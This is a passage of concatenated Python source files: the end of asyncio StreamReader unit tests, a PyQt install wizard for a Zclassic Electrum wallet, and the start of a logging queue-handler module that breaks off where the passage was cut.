self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAA', stream._buffer)
stream.feed_data(b'A')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'is found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.readexactly(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
@asyncio.coroutine
def set_err():
stream.set_exception(ValueError())
t1 = asyncio.Task(stream.readline(), loop=self.loop)
t2 = asyncio.Task(set_err(), loop=self.loop)
self.loop.run_until_complete(asyncio.wait([t1, t2], loop=self.loop))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.StreamReader(loop=self.loop)
t = asyncio.Task(stream.readline(), loop=self.loop)
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
class MyServer:
def __init__(self, loop):
self.server = None
self.loop = loop
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
def start(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client,
sock=sock,
loop=self.loop))
return sock.getsockname()
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
addr = sock.getsockname()
sock.close()
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client_callback,
host=addr[0], port=addr[1],
loop=self.loop))
return addr
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(addr):
reader, writer = await asyncio.open_connection(
*addr, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
return msgback
# test the server variant with a coroutine as client handler
server = MyServer(self.loop)
addr = server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
server = MyServer(self.loop)
addr = server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
@support.skip_unless_bind_unix_socket
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
reader, writer = await asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
return msgback
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# StreamReader's limit so that twice the limit is less than the size
# of the data written. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
reader = asyncio.StreamReader(loop=self.loop, limit=1)
protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(*args,
pass_fds={wfd},
loop=self.loop)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(reader.read(-1))
self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReader constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.StreamReader()
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = mock.Mock()
protocol = asyncio.StreamReaderProtocol(reader)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
q = queue.Queue()
def server():
# Runs in a separate thread.
sock = socket.socket()
with sock:
sock.bind(('localhost', 0))
sock.listen(1)
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
reader, writer = await asyncio.open_connection(
host, port, loop=self.loop)
while True:
writer.write(b"foo\n")
await writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.daemon = True
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
def test___repr__(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.StreamReader(loop=self.loop, limit=123)
self.assertEqual("<StreamReader limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
self.assertEqual("<StreamReader eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'data')
self.assertEqual("<StreamReader 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.StreamReader(loop=self.loop)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<StreamReader exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
r"<StreamReader waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__transport(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<StreamReader transport=<Transport>>", repr(stream))
def test_IncompleteReadError_pickleable(self):
e = asyncio.IncompleteReadError(b'abc', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.partial, e2.partial)
self.assertEqual(e.expected, e2.expected)
def test_LimitOverrunError_pickleable(self):
e = asyncio.LimitOverrunError('message', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.consumed, e2.consumed)
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
if __name__ == '__main__':
unittest.main()
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
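# QPainter.drawPie expects angles in 1/16ths of a degree, hence the factor
# of 16 in the slice angles below.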
for i in range(self.n):
alpha = int(16 * 360 * i / self.n)
alpha2 = int(16 * 360 * 1 / self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
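# Decorator for wizard steps: it updates the Back/Cancel button text, maps
# GoBack to backward navigation and UserCancelled to a no-op, and passes the
# wrapped function's return value(s) on to the run_next callback.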
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Zclassic Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for the base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Needed for Qt on macOS. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Zclassic Electrum Wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
else:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
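# Keep prompting until we end up with a readable, decrypted storage: new files
# and unencrypted files break out immediately; encrypted files are decrypted
# (by password or hardware device) first, and cancelling returns None.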
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
# FIXME if we get here because of mistyped passphrase
# then that passphrase gets "cached"
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet()
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
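# Show `layout` on the wizard page and run the nested event loop; raise
# UserCancelled (result 0, if raise_on_cancel) or GoBack (result 1),
# otherwise switch to the "please wait" view and return the result.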
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
queue.py
|
#
# Copyright (C) 2010-2017 Vinay Sajip. See LICENSE.txt for details.
#
"""
This module contains classes which help you work with queues. A typical
application is when you want to log from performance-critical threads, but
where the handlers you want to use are slow (for example,
:class:`~logging.handlers.SMTPHandler`). In that case, you can create a queue,
pass it to a :class:`QueueHandler` instance and use that instance with your
loggers. Elsewhere, you can instantiate a :class:`QueueListener` with the same
queue and some slow handlers, and call :meth:`~QueueListener.start` on it.
This will start monitoring the queue on a separate thread and call all the
configured handlers *on that thread*, so that your logging thread is not held
up by the slow handlers.
Note that as well as in-process queues, you can use these classes with queues
from the :mod:`multiprocessing` module.
**N.B.** This is part of the standard library since Python 3.2, so the
version here is for use with earlier Python versions.
"""
import logging
try:
import Queue as queue
except ImportError:
import queue
import threading
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
:param queue: The queue to send `LogRecords` to.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses :meth:`~queue.Queue.put_nowait`. You may
want to override this method if you want to use blocking, timeouts or
custom queue implementations.
:param record: The record to enqueue.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
:param record: The record to prepare.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
:param record: The record to emit.
"""
try:
